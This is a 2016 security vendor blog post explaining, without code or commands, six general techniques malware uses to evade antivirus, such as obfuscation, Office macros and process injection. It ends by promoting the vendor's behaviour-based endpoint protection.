Threats 101
Jonathan Crowe
Aug 2016

How Malware Gets Past Antivirus

Obfuscation and process injection and encryption, oh my! 


By this point, it's commonly accepted that cybersecurity is a cat and mouse game. Criminals develop a new type of attack, companies make new adjustments to their security to address it, criminals adapt. Rinse and repeat.

It's a cycle that's glaringly visible in the way traditional antivirus works:

  • Criminals unleash a new type of malware that sneaks past antivirus scanning, because antivirus programs don't recognize it as malware.
  • Eventually, AV vendors catch on, create an identifying signature for the new malware, and update their blacklists to block it.
  • Criminals react by retiring that version of the malware and then tweaking or disguising a new version so that it doesn't look the same.
  • The saga continues.


In order to break this cycle, security solutions — and the brave, tireless IT pros behind implementing those solutions — need to be more disruptive. How? By shifting their focus from the signature-matching game to identifying and blocking the common behaviors all malware relies on to function. 

Malware is as malware does

To put it another way, there are many, many different variants of malware (over 390,000 reported everyday, if you're keeping score at home). The standard approach to dealing with them has been to successfully identify each and every one and add them to a blacklist. Simply keeping up with that kind of volume alone is a tall order. But to tilt the playing field even further, malware authors have adopted techniques specifically designed to make AV detection more difficult (more on those below). 

A better approach is to realize the real distinguishing characteristic of malware isn't its signature, it's what it attempts to do

Blacklist a signature and you can block one specific malware variant. Prevent one of the basic actions necessary for malware to execute and you can render thousands of malware variants ineffective.  

To risk a sports metaphor, instead of trying to keep up with all the different plays Bill Belichick and Tom Brady dream up, wouldn't a more effective, game-changing defense be to make it impossible for Brady to throw the ball in the first place? What if, instead of attempting to defend against a hundred different possible plays at once, we simply took away the wide receivers, limiting his options? Or, better yet, what if we simply took away the ball?

That's the type of thinking we're using to develop our new approach to endpoint protection at Barkly. Because the thing is, while all those new malware variants created each and every day may look different, at a fundamental level, most of them act the same. 

Tricks malware plays to get past antivirus

To show you what I mean, here are six examples of (mis)behaviors modern malware uses to get past antivirus and cause damage on machines. We've designed Barkly to pick up on these behaviors (and many more) and stop them in the act, before the malware can do any harm. 

Even without Barkly, however, you can make considerable progress raising your defenses against malware by making these behaviors harder for malware to pull off. (Simple ex: Making sure Microsoft Office macros are disabled.) 

 

In case you're having any trouble reading the SlideShare, here are the highlights:

How malware avoids detection...

1) It wears clever disguises

Most antivirus solutions rely on signature-matching methods to identify malware. To avoid getting caught, hackers run malware through a cryptor or obfuscator that changes its signature. It’s like putting on a new outfit.

For a deeper, technical dive into the use of cryptors and obfuscation techniques, see our latest Malware Chat

2) It sneaks into Microsoft Office files as a macro

Microsoft Office macros are helpful for automating common tasks, but can also be used as a vehicle for hackers. If macros are set to auto-execute, malicious macros can start downloading and executing additional malware as soon as you open the file.

A good example of malware leveraging Office macros is Dridex

3) It hides inside your favorite programs

Malware likes to take advantage of popular programs, like browsers or readers, so it uses all of your access and resources to do its mischief without you noticing. It uses a technique called process injection to insert its code into a program that’s currently running, adding the functionality it needs to attack.

Once it’s on a device…

4) It launches a coup for system admin privileges

Power-hungry malware attempts to gain administrator privilege on your system by dodging controls that exist to manage user access control and authorization in the kernel of the operating system.

That's why it's typically a good idea to limit user access privileges to the bare minimum they need to do their jobs. 

5) It uses handy tools to steal your passwords

Malware uses special tools, like keyloggers and credential stealers, to get the keys to systems you have access to. These tools enable hackers to steal your user passwords, leaving any system you log into vulnerable.

6) It looks around for unsuspecting files to invade

Some malware uses a file scan technique to look at every file on your hard drive to overwrite as many files as it can with malicious executable components. When you open one of those programs, it executes the malicious code.

Virlock ransomware is one scary example, leveraging parasitic virus techniques to infect and encrypt as many files as possible.

 

Free malware protection

You likely already have antivirus. And that's a good thing. But if you’re like the other 90% of security professionals actively looking to replace or augment their current AV, you’ve also got good reason to think antivirus alone isn’t enough.

Here at Barkly, we’re excited to be driving a major shift toward better endpoint protection built around understanding, monitoring, and reacting to malicious behavior. 

If you're interested in seeing what types of malware your antivirus is missing, you can give Barkly a free spin right now. You'll even be protected from malware that hasn't been seen yet. 

Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.

lock-white.png

Close the gaps in your security

Stop paying for AV, get the strongest protection instead. See how Barkly blocks attacks that are getting past AV.

See a demo

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.